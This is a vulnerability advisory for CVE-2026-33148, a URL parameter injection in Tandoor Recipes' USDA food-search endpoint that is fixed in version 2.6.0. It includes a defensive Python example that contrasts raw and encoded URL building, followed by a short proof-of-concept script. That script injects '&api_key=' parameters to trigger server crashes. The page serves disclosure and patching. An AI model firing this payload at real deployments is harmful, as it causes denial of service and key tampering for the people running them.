Security Vulnerability Report
CVE-2026-33148 CVSS 6.5 MEDIUM

CVE-2026-33148

Published: 2026-03-26 19:17:03
Last Modified: 2026-03-30 19:26:50

Description

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. In versions prior to 2.6.0, the FDC (USDA FoodData Central) search endpoint constructs an upstream API URL by directly interpolating the user-supplied `query` parameter into the URL string without URL-encoding. An attacker can inject additional URL parameters by including `&` characters in the query value. This allows overriding the API key, manipulating upstream query behavior, and causing server crashes (HTTP 500) via malformed requests — a Denial of Service condition. Version 2.6.0 patches the issue.
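The construction flaw described above, as an added example that is not Tandoor's own code: a raw-interpolation URL builder beside the percent-encoded form that closes the hole, plus a check a test suite could run on the outgoing URL. The upstream base URL, the parameter names and the key value are assumed for illustration.

```python
# Added example, not Tandoor's code: the URL-construction flaw the advisory
# describes, beside the encoded form that closes it. The upstream base URL,
# parameter names and key value are assumed for illustration.
from urllib.parse import parse_qs, urlencode, urlsplit

FDC_BASE = "https://api.nal.usda.gov/fdc/v1/foods/search"  # assumed upstream
SERVER_API_KEY = "SERVER-KEY-PLACEHOLDER"                  # constructed value


def build_fdc_url_vulnerable(query: str) -> str:
    """Raw interpolation: an '&' inside `query` starts a new parameter, so
    user input can add or repeat api_key and any other upstream parameter."""
    return f"{FDC_BASE}?query={query}&api_key={SERVER_API_KEY}"


def build_fdc_url_fixed(query: str) -> str:
    """urlencode percent-encodes '&', '=' and '?' inside each value, so the
    whole user string travels as the single value of `query`."""
    return f"{FDC_BASE}?{urlencode({'query': query, 'api_key': SERVER_API_KEY})}"


def upstream_view(url: str) -> dict:
    """Decode the query string the way the upstream API would receive it.
    parse_qs keeps every occurrence of a repeated key, which is exactly the
    ambiguity an injected api_key relies on."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {"query": qs.get("query", []), "api_key": qs.get("api_key", [])}


def outgoing_url_is_well_formed(url: str) -> bool:
    """Defensive check for a test suite: the URL sent upstream must carry
    exactly the parameters the application meant to send, each exactly once."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return set(qs) == {"query", "api_key"} and all(len(v) == 1 for v in qs.values())


if __name__ == "__main__":
    probe = "chicken&api_key=injected"
    print("vulnerable:", upstream_view(build_fdc_url_vulnerable(probe)))
    print("fixed:     ", upstream_view(build_fdc_url_fixed(probe)))
```

Run stand-alone, the vulnerable builder yields two api_key values upstream while the fixed builder keeps the entire string inside `query`.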

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Weakness: CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component, 'Injection')

Configurations (Affected Products)

cpe:2.3:a:tandoor:recipes:*:*:*:*:*:*:*:* - VULNERABLE
Tandoor Recipes < 2.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

target_url = "http://localhost:8000/api/search/fdc/"

# Malicious payload injecting an extra parameter
# This attempts to override the api_key or cause a DoS
malicious_query = "chicken&api_key=invalid&malformed_param="
params = {"query": malicious_query}

# Send the request
response = requests.get(target_url, params=params)

# Check if server crashes or behaves unexpectedly
print(f"Status Code: {response.status_code}")
if response.status_code == 500:
    print("Vulnerability confirmed: Server crash triggered.")
else:
    print("Server responded, check response body for parameter injection.")

References

https://github.com/TandoorRecipes/recipes/security/advisories/GHSA-43p3-wx6h-9g7w (Exploit, Vendor Advisory)
